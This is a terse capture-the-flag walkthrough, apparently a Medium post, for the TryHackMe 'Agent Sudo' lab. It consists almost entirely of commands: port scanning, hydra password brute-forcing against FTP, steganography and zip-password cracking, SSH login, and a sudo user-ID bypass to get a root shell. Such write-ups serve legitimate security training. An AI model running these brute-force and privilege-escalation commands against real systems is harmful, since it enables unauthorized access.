TryHackMe : Agent Sudo

  1. How many open ports?
nmap -Pn <ip>
nmap -Pn -p1000 <ip>
nmap -A -p 21,22,80 <ip>
nmap --script vuln -p 21,22,80 <ip>
  1. FTP password
echo chris > users.txt
echo C >> users.txt
echo c >> users.txt
cat users.txt
hydra -L users.txt -P rockyou.txt ftp://<ip> -u -F -V
ftp <ip>chriscrystal
ls
get To_agentJ.txtget cute-alien.jpgget cutie.png
cat To_agentJ.txt
exiftool cute-alien.jpg
bless cute-alien.jpg
steghide extract -sf cute-alien.jpg
exiftool cutie.jpg
bless cute-alien.jpg
foremost cutie.png
fcrackzip -u -v -D -p rockyou.txt 00000067.zip
zip2john 00000067.zip  > zip.hashjohn zip.hashjohn zip.hash --show
steghide extract -sf cute-alien.jpg
steghide extract -sf cute-alien.jpg
cat message.txt
  1. What is the user flag?
ssh james@<ip>
lscat user_flag.txt
scp Alien_autospy.jpg james@10.10.205.123:/home/james
exiftool Alien_autospy.jpg
roswell new mexico alien foxnews
  1. CVE number for the escalation (Format: CVE-xxxx-xxxx)
uname -a
sudo -l
sudo bash
sudo -u#-1 /bin/bash
cd /rootlscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store